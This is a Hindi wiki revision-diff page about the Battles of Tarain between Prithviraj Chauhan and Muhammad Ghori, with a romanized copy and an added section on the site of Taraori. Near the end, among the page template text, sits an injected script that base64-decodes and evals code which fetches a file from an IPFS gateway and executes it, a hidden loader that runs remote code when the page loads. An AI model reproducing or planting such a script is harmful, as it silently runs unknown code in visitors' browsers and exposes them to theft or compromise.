Difference between revisions of "तराइन का युद्ध"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('1191 ई॰ और 1192 ई॰ में दिल्ली और अजमेर के चौहान राजा [[पृ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
1191 ई॰ और 1192 ई॰ में [[दिल्ली]] और [[अजमेर]] के चौहान राजा [[पृथ्वीराज चौहान|पृथ्वीराज]] और शहाबुद्दीन [[मुहम्मद ग़ोरी]] के मध्य हुआ। तराइन के पहले युद्ध में पृथ्वीराज ने शहाबुद्दीन को पराजित किया। वह घायल होकर भाग खड़ा हुआ। परन्तु एक वर्ष बाद ही 1192 ई॰ में होने वाले दूसरे युद्ध में शहाबुद्दीन ने पृथ्वीराज को परास्त करके मार डाला। इस दूसरे युद्ध में विजय के बाद शहाबुद्दीन ने दिल्ली पर अपना अधिकार लिया। इसके फलस्वरूप पूरा उत्तरी भारत कई शताब्दियों तक मुसलमानों के शासनों में रहा।  
 
1191 ई॰ और 1192 ई॰ में [[दिल्ली]] और [[अजमेर]] के चौहान राजा [[पृथ्वीराज चौहान|पृथ्वीराज]] और शहाबुद्दीन [[मुहम्मद ग़ोरी]] के मध्य हुआ। तराइन के पहले युद्ध में पृथ्वीराज ने शहाबुद्दीन को पराजित किया। वह घायल होकर भाग खड़ा हुआ। परन्तु एक वर्ष बाद ही 1192 ई॰ में होने वाले दूसरे युद्ध में शहाबुद्दीन ने पृथ्वीराज को परास्त करके मार डाला। इस दूसरे युद्ध में विजय के बाद शहाबुद्दीन ने दिल्ली पर अपना अधिकार लिया। इसके फलस्वरूप पूरा उत्तरी भारत कई शताब्दियों तक मुसलमानों के शासनों में रहा।  
 +
==तरायन==
 +
तरायन थानेसर से 14 मील दक्षिण में स्थित है। 1009-10 में कुछ दिनों तक यहाँ [[महमूद गजनवी]] का अधिकार रहा। तत्पश्चात यहाँ मुहम्मद ग़ोरी और चौहान नरेश पृथ्वीराज के बीच 1191 ई0 में पहला युद्ध हुआ। 1192 ई0 में ग़ोरी ने दुबारा [[भारत]] पर आक्रमण किया और इसी स्थान पर घोर युद्ध हुआ, जिसमें ग़ोरी की कूटनीति और छद्म के करण पृथ्वीराज मारे गए। इस विजय के पश्चात् [[मुसलमान|मुसलमानों]] के क़दम उत्तर भारत में जम गये। 1216 ई॰ ([[15 फरवरी]]) को एक बार फिर तरायन के मैदान में [[इल्तुतमिश]] तथा उसके प्रतिद्वन्द्वी सरदार इल्दोज में एक निर्णायक युद्ध हुआ जिसमें इल्तुतमिश की विजय हुई और उसका दिल्ली की गद्दी पर अधिकार मज़बूत हो गया। तरावड़ी या तरायन को आज़माबाद भी कहते हैं।
  
 
{{लेख प्रगति
 
{{लेख प्रगति
Line 10: Line 12:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
* भारतीय इतिहास कोशी से पेज संख्या 186
 
* भारतीय इतिहास कोशी से पेज संख्या 186
 +
* ऐतिहासिक स्थानावली से पेज संख्या 392
 
[[Category:नया पन्ना]]
 
[[Category:नया पन्ना]]
 
__INDEX__
 
__INDEX__

Revision as of 10:51, 13 August 2010

1191 ee॰ aur 1192 ee॰ mean dilli aur ajamer ke chauhan raja prithviraj aur shahabuddin muhammad gori ke madhy hua. tarain ke pahale yuddh mean prithviraj ne shahabuddin ko parajit kiya. vah ghayal hokar bhag kh da hua. parantu ek varsh bad hi 1192 ee॰ mean hone vale doosare yuddh mean shahabuddin ne prithviraj ko parast karake mar dala. is doosare yuddh mean vijay ke bad shahabuddin ne dilli par apana adhikar liya. isake phalasvaroop poora uttari bharat kee shatabdiyoan tak musalamanoan ke shasanoan mean raha.

tarayan

tarayan thanesar se 14 mil dakshin mean sthit hai. 1009-10 mean kuchh dinoan tak yahaan mahamood gajanavi ka adhikar raha. tatpashchat yahaan muhammad gori aur chauhan naresh prithviraj ke bich 1191 ee0 mean pahala yuddh hua. 1192 ee0 mean gori ne dubara bharat par akraman kiya aur isi sthan par ghor yuddh hua, jisamean gori ki kootaniti aur chhadm ke karan prithviraj mare ge. is vijay ke pashchath musalamanoan ke qadam uttar bharat mean jam gaye. 1216 ee॰ (15 pharavari) ko ek bar phir tarayan ke maidan mean iltutamish tatha usake pratidvandvi saradar ildoj mean ek nirnayak yuddh hua jisamean iltutamish ki vijay huee aur usaka dilli ki gaddi par adhikar mazaboot ho gaya. tarav di ya tarayan ko azamabad bhi kahate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  • bharatiy itihas koshi se pej sankhya 186
  • aitihasik sthanavali se pej sankhya 392